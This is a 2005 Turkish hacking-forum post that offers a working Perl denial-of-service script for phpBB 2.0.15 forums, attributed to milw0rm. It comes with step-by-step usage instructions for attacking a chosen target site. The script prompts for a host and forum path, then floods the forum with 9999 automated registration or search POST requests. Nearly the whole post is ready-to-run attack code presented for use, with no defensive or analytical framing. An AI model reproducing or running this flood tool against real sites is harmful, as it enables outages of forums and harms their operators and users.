Konu: Artik Exploİte BaŞlayalim
Tek Mesajı Görüntüle
Old 09-01-2005, 08:34 AM   #3
jackal
Geçerken Uğradım
 
Üyelik Tarihi: Aug 2005
Mesajlar: 99
Teşekkür Etme: 1
Thanked 50 Times in 23 Posts
Üye No: 5
İtibar Gücü: 1499
Rep Puanı : 2460
Rep Derecesi : jackal has a reputation beyond reputejackal has a reputation beyond reputejackal has a reputation beyond reputejackal has a reputation beyond reputejackal has a reputation beyond reputejackal has a reputation beyond reputejackal has a reputation beyond reputejackal has a reputation beyond reputejackal has a reputation beyond reputejackal has a reputation beyond reputejackal has a reputation beyond repute
Cinsiyet :
Varsayılan Ynt: Artik Exploİte BaŞlayalim
phpBB 2.0.15 Dos ExPloiT

Kullanımı:

1.)Pc nize ActivePerl i kuruyorsunuz..

2.)Aşağıda verdiğim kodu NotDefterine Copy Paste yapıyorsunuz.

3.)Daha sonra bu txt dosyasının uzantısını pl yapıyorsunuz[Çünkü Perl de kullanacağız]

4.)Bu pl uzantılı dosyayı PC nizin C: dizinine kurduğunuz Perl Klasörünün içine koyuyoruz .

5.)Bu pl uzantılı dosyayı çalıştırdığınızda zaten kullanımı Türkçe olduğundan verilen adımlar takip ederek hedef siteye DOS saldırısı yapabilirsiniz.


kod:

#!/usr/bin/perl
## Name: NsT-phpBBDoS (Perl Version)

use IO::Socket;

## Initialized X
$x = 0;

## Flood Variables Provided By User
print q(


);
print q(Site adresi |dikkat - basina http://www yazmayin| );
$host = <STDIN>;
chop ($host);

print q(Forum yolu |Ornek. /phpBB2/ | );
$pth = <STDIN>;
chop ($pth);

print q(Flood Metodu |1 = Kayit, 2 = Arama| );
$type = <STDIN>;
chop ($type);

## If Type Is Equals To 1 or Registration
if($type == 1){

## User Loop for 9999 loops (enough for Flood xDDDD)
while($x != 9999)
{

## Building User in base X
$uname = "username=NsT__" . "$x";

## Building User Mail in base X
$umail = "&email=NsT__" . "$x";

## Final String to Send
$postit = "$uname"."$umail"."%40neosecurityteam.net&new_pass word=0123456&password_confirm=0123456&icq=&aim=N%2 FA&msn=&yim=&website=&**********&occupation=&intere sts=&signature=&viewemail=0&hideonline=0¬ifyreply= 0¬ifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&all owhtml=0&allowsmilies=1&language=english&style=2&t imezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=regis ter&agreed=true&coppa=0&submit=Submit";

## Posit Length
$lrg = length $postit;

## Connect Socket with Variables Provided By User
my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "\nistediginiz adrese baglanilamiyor ya yazlislik var ya da saldiri basarili: $!\n" unless $sock;

## Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums
print $sock "POST $pth"."profile.php HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Accept-Encoding: gzip, deflate\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Connection: Keep-Alive\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);

## Print a "." for every loop
syswrite STDOUT, ".";

## Increment X in One for every Loop
$x++;
}

## If Type Is Equals To 2 or Search
}
elsif ($type == 2){

## User Search Loop for 9999 loops (enough for Flood xDDDD)
while($x != 9999)
{
## Final Search String to Send
$postit = "search_keywords=Neo+Security+Team+Proof+of+Concep t +$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat =-1&sort_by=0&sort_dir=ASC&show_results=posts&return _chars=200";

## Posit Length
$lrg = length $postit;

## Connect Socket with Variables Provided By User
my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "\nistediginiz adrese baglanilamiyor ya yazlislik var ya da saldiri basarili: $!\n" unless $sock;

## Sending Truth Socket The HTTP Commands For Send A BD Search Into phpBB Forums
print $sock "POST $pth"."search.php?mode=results HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Accept-Encoding: gzip, deflate\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Connection: Keep-Alive\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);

## Print a "." for every loop
syswrite STDOUT, ".";

## Increment X in One for every Loop
$x++;
}
}else{
## STF??? What Do You Type
die "Secenek engellendi - bir hata var\n";
}

# milw0rm.com [2005-06-22]
jackal çevrimdışı   Alıntı ile Cevapla